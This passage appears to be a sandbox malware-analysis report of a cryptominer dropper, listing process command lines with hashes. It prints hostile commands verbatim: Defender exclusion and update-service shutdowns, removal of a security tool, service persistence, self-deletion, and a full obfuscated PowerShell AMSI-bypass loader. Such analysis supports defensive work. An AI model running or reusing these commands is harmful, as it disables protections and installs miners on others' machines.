                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:29
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:30
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:31
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:32
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:33
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe start "HGLZSDMZ"
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:34
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:35
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"
                                                                Imagebase:0x7ff6d9560000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

Target ID:36
Start time:11:23:01
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:11:23:01
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:11:23:01
Start date:25/12/2024
Path:C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
Imagebase:0x7ff7699e0000
File size:5'457'920 bytes
MD5 hash:3CAE1F11044D2CA787824610A40F1696
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 66%, ReversingLabs
Has exited:true

Target ID:39
Start time:11:23:01
Start date:25/12/2024
Path:C:\Windows\System32\choice.exe
Wow64 process (32bit):false
Commandline:choice /C Y /N /D Y /T 3
Imagebase:0x7ff6bd210000
File size:35'840 bytes
MD5 hash:1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:11:23:01
Start date:25/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:11:23:01
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:0x7ff6d9560000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:0x7ff7a5b00000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\wusa.exe
Wow64 process (32bit):false
Commandline:wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:0x7ff74dc80000
File size:345'088 bytes
MD5 hash:FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:0x7ff7a5b00000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop wuauserv
Imagebase:0x7ff7a5b00000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:11:23:03
Start date:25/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop bits
Imagebase:0x7ff7a5b00000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:52
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop dosvc
Imagebase:0x7ff7a5b00000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:0x7ff75d8f0000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:0x7ff75d8f0000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:0x7ff75d8f0000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:0x7ff75d8f0000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:11:23:04
Start date:25/12/2024
Path:C:\Windows\System32\dialer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\dialer.exe
Imagebase:0x7ff7c38e0000
File size:39'936 bytes
MD5 hash:B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                Target ID:63
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:64
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dialer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\dialer.exe
                                                                Imagebase:0x7ff7c38e0000
                                                                File size:39'936 bytes
                                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:65
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dialer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:dialer.exe
                                                                Imagebase:0x7ff7c38e0000
                                                                File size:39'936 bytes
                                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2939799608.000002F62B721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2939799608.000002F62B6C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                Has exited:false

                                                                Target ID:66
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+
''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+'s');$BXLsZikXLBwiCU=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,St'+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PODdpwJbLVAeqmqHxFL=DwpcGqRaxEQb @([String])([IntPtr]);$yBpeaDKUEGooqcDLMYJxLn=DwpcGqRaxEQb 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ckLkUNcHalt=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dll')));$gtTuUeciWixJxL=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+'Li'+[Char](98)+'r'+[Char](97)+'ryA')));$XRPINnzEnujTAspan=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+'t'+'')));$DBzwtCM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gtTuUeciWixJxL,$PODdpwJbLVAeqmqHxFL).Invoke(''+[Char](97)+''+[Char](109)+'si'+'.'+''+[Char](100)+'ll');$DyCMYouZARyvvTbwm=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$DBzwtCM,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+'a'+'n'+'B'+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$GgVQgYCQUN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,4,[ref]$GgVQgYCQUN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DyCMYouZARyvvTbwm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,0x20,[ref]$GgVQgYCQUN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l'+''+'e'+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:67
                                                                Start time:11:23:04
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:68
                                                                Start time:11:23:05
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dllhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}
                                                                Imagebase:0x7ff70f330000
                                                                File size:21'312 bytes
                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:69
                                                                Start time:11:23:05
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\winlogon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:winlogon.exe
                                                                Imagebase:0x7ff7cd660000
                                                                File size:906'240 bytes
                                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:70
                                                                Start time:11:23:05
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\lsass.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\lsass.exe
                                                                Imagebase:0x7ff7a2ae0000
                                                                File size:59'456 bytes
                                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:71
                                                                Start time:11:23:06
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                Imagebase:0x7ff6eef20000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:72
                                                                Start time:11:23:06
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dwm.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"dwm.exe"
                                                                Imagebase:0x7ff74e710000
                                                                File size:94'720 bytes
                                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:73
                                                                Start time:11:23:06
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dllhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
                                                                Imagebase:0x7ff70f330000
                                                                File size:21'312 bytes
                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:74
                                                                Start time:11:23:07
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                Imagebase:0x7ff6eef20000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:75
                                                                Start time:11:23:07
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                Imagebase:0x7ff6eef20000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727657135.00007FF712421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712420000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727623183.00007FF712420000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727699824.00007FF71242C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727738634.00007FF71242F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727772505.00007FF712430000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728525064.00007FF71291F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728573416.00007FF712958000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
